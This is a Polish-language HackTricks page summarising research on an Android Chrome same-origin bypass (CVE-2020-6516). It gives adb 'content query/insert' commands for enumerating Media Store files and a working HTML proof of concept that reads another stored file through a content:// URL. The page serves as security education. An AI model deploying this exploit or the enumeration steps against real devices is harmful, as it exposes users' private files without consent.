6 KiB
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.
To jest streszczenie postu https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/
Wyświetlanie plików w Media Store
Aby wyświetlić pliki zarządzane przez Media Store, można użyć poniższej komendy:
$ content query --uri content://media/external/file
Dla bardziej przyjaznego dla użytkownika wyjścia, wyświetlającego tylko identyfikator i ścieżkę każdego zindeksowanego pliku:
$ content query --uri content://media/external/file --projection _id,_data
Dostawcy treści są izolowani w swojej własnej prywatnej przestrzeni nazw. Dostęp do dostawcy wymaga określonego URI content://
. Informacje o ścieżkach dostępu do dostawcy można uzyskać z manifestów aplikacji lub kodu źródłowego frameworka Android.
Dostęp Chrome do dostawców treści
Chrome na Androidzie może uzyskać dostęp do dostawców treści za pomocą schematu content://
, co pozwala mu uzyskać dostęp do zasobów, takich jak zdjęcia lub dokumenty eksportowane przez aplikacje innych firm. Aby to zilustrować, można wstawić plik do Media Store, a następnie uzyskać do niego dostęp za pomocą Chrome:
Wstaw niestandardowy wpis do Media Store:
cd /sdcard
echo "Hello, world!" > test.txt
content insert --uri content://media/external/file \
--bind _data:s:/storage/emulated/0/test.txt \
--bind mime_type:s:text/plain
Odkryj identyfikator nowo wstawionego pliku:
content query --uri content://media/external/file \
--projection _id,_data | grep test.txt
# Output: Row: 283 _id=747, _data=/storage/emulated/0/test.txt
Plik można następnie wyświetlić w przeglądarce Chrome, używając adresu URL skonstruowanego z identyfikatorem pliku.
Na przykład, aby wyświetlić listę plików związanych z konkretną aplikacją:
content query --uri content://media/external/file --projection _id,_data | grep -i <app_name>
Chrome CVE-2020-6516: Bypass Same-Origin-Policy
Same Origin Policy (SOP) to protokół bezpieczeństwa w przeglądarkach, który ogranicza interakcję stron internetowych z zasobami pochodzącymi z innych źródeł, chyba że jest to wyraźnie zezwolone przez politykę Cross-Origin-Resource-Sharing (CORS). Polityka ta ma na celu zapobieganie wyciekom informacji i podrobieniom żądań między stronami. Chrome traktuje content://
jako lokalny schemat, co oznacza bardziej restrykcyjne zasady SOP, gdzie każdy adres URL z lokalnym schematem jest traktowany jako osobne źródło.
Jednak CVE-2020-6516 to podatność w Chrome, która umożliwia obejście zasad SOP dla zasobów ładowanych za pomocą adresu URL content://
. W praktyce oznacza to, że kod JavaScript z adresu URL content://
mógł uzyskać dostęp do innych zasobów ładowanych za pomocą adresów URL content://
, co stanowiło poważne zagrożenie dla bezpieczeństwa, zwłaszcza na urządzeniach z systemem Android w wersjach wcześniejszych niż Android 10, gdzie nie było wdrożonego przechowywania z zasięgiem.
Poniżej znajduje się przykład wykorzystania tej podatności, gdzie dokument HTML, po przesłaniu go do /sdcard i dodaniu do Media Store, używa XMLHttpRequest
w swoim kodzie JavaScript, aby uzyskać dostęp i wyświetlić zawartość innego pliku w Media Store, omijając zasady SOP.
Przykład HTML:
<html>
<head>
<title>PoC</title>
<script type="text/javascript">
function poc()
{
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function()
{
if(this.readyState == 4)
{
if(this.status == 200 || this.status == 0)
{
alert(xhr.response);
}
}
}
xhr.open("GET", "content://media/external/file/747");
xhr.send();
}
</script>
</head>
<body onload="poc()"></body>
</html>
Dowiedz się, jak hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć reklamę swojej firmy w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.